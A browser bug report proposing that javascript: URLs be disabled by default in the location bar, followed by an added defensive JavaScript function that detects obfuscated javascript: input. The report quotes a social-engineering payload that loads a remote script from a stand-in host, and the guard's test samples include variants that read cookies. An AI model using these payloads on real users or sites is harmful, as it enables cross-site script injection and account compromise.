Consider disabling javascript protocol handler in location bar by default

RESOLVED DUPLICATE of bug 656433

Severity: enhancement

Reporter: voghsazjivucequetgigodry (Unassigned)


Description (Reporter, 7 years ago)
User-Agent:       Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Build Identifier: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0

An increasingly common attack is to ask the user to paste something like this into their location bar:

   javascript:(a=(b=document).createElement('script')).src='//example.com/dodgy.js',b.body.appendChild(a);void(0)

which would execute the script http://example.com/dodgy.js in the user's browser and in the security context of the current website. For example, this technique is currently doing the rounds via Facebook where the target script attempts to compromise the user's privacy and spam their contacts.

To prevent such manual cross-site scripting attacks, and because for the vast majority of users the javascript URL is not useful, I think that the javascript protocol handler should be disabled in the address bar by default. (Only in the address bar though, as of course this protocol handler is required in anchor tags and suchlike.)

The majority of users have no use for entering such URLs there, but as web developers and other power users would object to this restriction as they have a genuine use for this (and are most likely to be able to spot malicious script), I think also it should be a configurable option somewhere in the Options, perhaps in Advanced or Security.

Reproducible: Always
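As an added example (not code from this bug report or from Firefox), a location-bar guard that classifies pasted input by its URL scheme the way the URL parser does, so letter case, surrounding control characters and embedded tab/newline characters cannot slip a javascript: URL past the check; the allowJavascriptUrls flag is a hypothetical stand-in for the opt-in preference the report asks for.

```javascript
// Added example, not from the bug or from Firefox: decide whether a string
// submitted in the location bar is a javascript: URL and should be refused.

// Mirror the WHATWG URL parser's scheme handling: leading/trailing C0 control
// characters and spaces are trimmed, and ASCII tab/newline are removed
// everywhere, so "java\tscript:" still resolves to the javascript scheme.
function extractScheme(input) {
  const stripped = String(input)
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '')
    .replace(/[\t\n\r]/g, '');
  const m = /^([a-zA-Z][a-zA-Z0-9+.-]*):/.exec(stripped);
  return m ? m[1].toLowerCase() : null;
}

function isJavascriptUrl(input) {
  return extractScheme(input) === 'javascript';
}

// Decision for one location-bar submission. allowJavascriptUrls stands in for
// the power-user preference proposed in the report (hypothetical; no real
// preference name is implied). Any non-javascript scheme is passed through.
function guardLocationBarInput(input, allowJavascriptUrls = false) {
  if (!isJavascriptUrl(input)) {
    return { allowed: true, reason: 'not a javascript: URL' };
  }
  if (allowJavascriptUrls) {
    return { allowed: true, reason: 'javascript: URL permitted by preference' };
  }
  return { allowed: false, reason: 'javascript: URLs are disabled in the location bar' };
}

// Constructed samples: the payload shape quoted in the report, three
// obfuscated spellings of the same scheme, and two non-javascript inputs
// that merely contain the word.
const SAMPLES = [
  "javascript:(a=(b=document).createElement('script')).src='//example.com/dodgy.js',b.body.appendChild(a);void(0)",
  '  JavaScript:void(0)',
  'java\tscript:alert(document.cookie)',
  '\u0001javascript:1',
  'https://example.com/?q=javascript:alert(1)',
  'example.com/javascript:',
];

// Returns an array of [input, allowed] pairs for the samples above.
function classifySamples(allowJavascriptUrls = false) {
  return SAMPLES.map((s) => [s, guardLocationBarInput(s, allowJavascriptUrls).allowed]);
}

for (const [s, allowed] of classifySamples()) {
  console.log(allowed ? 'ALLOW ' : 'BLOCK ', JSON.stringify(s));
}
```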
Status: UNCONFIRMED → RESOLVED
Last Resolved: 7 years ago
Resolution: --- → DUPLICATE
Duplicate of bug: 656433